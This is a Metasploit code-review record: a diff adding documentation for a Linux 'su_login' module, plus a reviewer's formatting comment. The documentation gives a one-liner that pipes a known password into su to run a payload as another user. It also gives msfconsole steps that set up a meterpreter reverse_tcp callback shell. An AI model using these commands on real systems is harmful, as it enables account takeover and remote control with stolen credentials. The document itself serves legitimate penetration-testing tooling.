documentation/modules/exploit/linux/local/su_login.md

```diff
@@ -0,0 +1,59 @@
+## Description
+
+  This module attempts to create a new login session by invoking the su command of a valid username and 
+  password. If the login is successful, a new session is created via the specified payload. While this 
+  functionality can be reproduced by a TTY shell, a hacker might want to switch users with a meterpreter 
+  session, or simply have all of their shells managed in one place.
+
+  The su command is used in Linux and Unix environments to change to another user in Linux. We can use this
+  command to launch our payload as another user by running `su - [username] -c [payload]`. However, because
+  you cannot pass in the password into su directly, we have to get a little more crafty. By running a command
+  in sh, we can pipe the output to our su command (kind of) by using the following command:
+  `sh -c 'sleep 1; echo [password]' | script /dev/null -qc 'su - [username] -c [payload]'`.
+
+  Working example: `sh -c 'sleep 1; echo lamepassword' | script /dev/null -qc 'su - admin -c /tmp/shell'`
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. Get valid target username and password
+  4. Do: `use exploit/linux/local/su_login`
+  5. Do: `set SESSION [SESSION]`
+  6. Do: `set USERNAME [USERNAME]`
+  7. Do: `set PASSWORD [PASSWORD]`
+  8. Do: `set PAYLOAD linux/x86/meterpreter/reverse_tcp`
+  9. Do: `set LHOST [LHOST]`
+  10. Do: `set LPORT [LPORT]`
+  11. Do: `run`
+  12. You should get a new session as the specified user
+
+## Options
+
+  | Name     | Description                                         |
+  |----------|-----------------------------------------------------|
+  | SESSION  | Which session to use, can be viewed with `sessions` |
+  | USERNAME | The username of the user to switch to               |
+  | PASSWORD | The password of the user to switch to               |
```

Comment:
List each option specific to this module (`SESSION` is common to every post module and should not be listed here) and how to use it (see the documentation [template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md#options)):
```suggestion
  ### USERNAME
  The username of the user to switch to
  
  ### PASSWORD
  The password of the user to switch to
```

Reply:
Fixed. See commit 17483f838e9c33851be2595ff0e10480f6b908ca